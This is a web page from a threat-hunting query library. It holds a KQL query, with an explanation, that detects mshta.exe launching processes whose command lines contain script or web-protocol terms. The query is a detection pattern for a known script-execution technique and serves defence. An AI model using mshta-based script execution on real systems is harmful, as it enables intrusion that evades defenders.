KQL Search

Query Details

HomeAI ToolsDevice Query

MSHTA Executions

Query

Tags:

Query:
DeviceProcessEvents
| where InitiatingProcessFileName contains "mshta.exe"
and ProcessCommandLine  has_any ("javascript", "about" , "vbscript", "http", "ftp")
Refernces:

Explanation

This query is searching for specific events related to processes on devices. Here's a simple breakdown:

  1. Data Source: It looks at DeviceProcessEvents, which logs events related to processes on devices.
  2. Filter by Process: It filters these events to find those where the initiating process's file name includes "mshta.exe". This executable is often associated with running HTML applications.
  3. Filter by Command Line: It further narrows down the results to those where the command line used to start the process contains any of the following terms: "javascript", "about", "vbscript", "http", or "ftp".

In summary, the query identifies instances where "mshta.exe" is used to run commands that include potentially suspicious or noteworthy terms related to scripting or web protocols.

Details

Ali Hussein profile picture

Ali Hussein

Released: December 4, 2023

Tables

DeviceProcessEvents

Keywords

DeviceProcessEvents

Operators

DeviceProcessEvents|wherecontainsandhas_any

Actions